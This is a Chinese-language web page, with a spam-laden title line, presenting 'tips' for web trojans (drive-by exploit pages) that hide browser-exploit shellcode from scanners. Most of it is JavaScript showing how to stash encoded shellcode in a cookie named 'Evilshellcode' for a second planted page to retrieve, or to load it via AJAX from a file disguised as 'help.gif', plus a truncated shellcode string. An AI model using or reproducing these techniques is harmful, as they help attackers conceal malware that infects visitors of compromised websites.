压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

一個(gè)網(wǎng)馬的tips技術(shù)性研究

  把網(wǎng)馬拆分,shellcode代碼存在另一個(gè)地方。好比把一個(gè)網(wǎng)馬的shellcode存在cookie里,別一個(gè)頁(yè)面來(lái)調(diào)用。或是存在另一個(gè)文件里用ajax來(lái)調(diào)用。當(dāng)然想存更多的代碼也可以。

  一個(gè)網(wǎng)馬的tips技術(shù)性研究cookie示例代碼:

  //存放

  function setCookie(sVar, sVal){

  theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC';

  document.cookie = theCookie;}

  shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec……"

  setCookie('Evilshellcode', shellcode);

  //取出

  function getCookie(sVar){

  cookies = document.cookie.split('; ');

  for(var i = 1; i <= cookies.length; i++){

  if(cookies[i – 1].split('=')[0] == sVar){return cookies[i – 1].split('=')[1];}}

  return '';

  }

  a=unescape(getCookie('Evilshellcode'))

  cookie存放的話,可以掛兩次,第一次掛cookie寫入代碼無(wú)害,第二次再取出來(lái)結(jié)合新掛的代碼來(lái)運(yùn)行。怎么用隨你了。

  ajax來(lái)調(diào)用

  <script src="http://www.xxxxxx.com/files/jquery-1.3.2.min.js" type="text/javascript"></script>

  var shellcode = $.ajax({

  url: "help.gif",

  async: false

  }).responseText

  help.gif內(nèi)容

  %9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

 

上一篇:安卓防火墻 PS DroidWall

下一篇:好用的過(guò)ie8的網(wǎng)馬,重在技術(shù)研究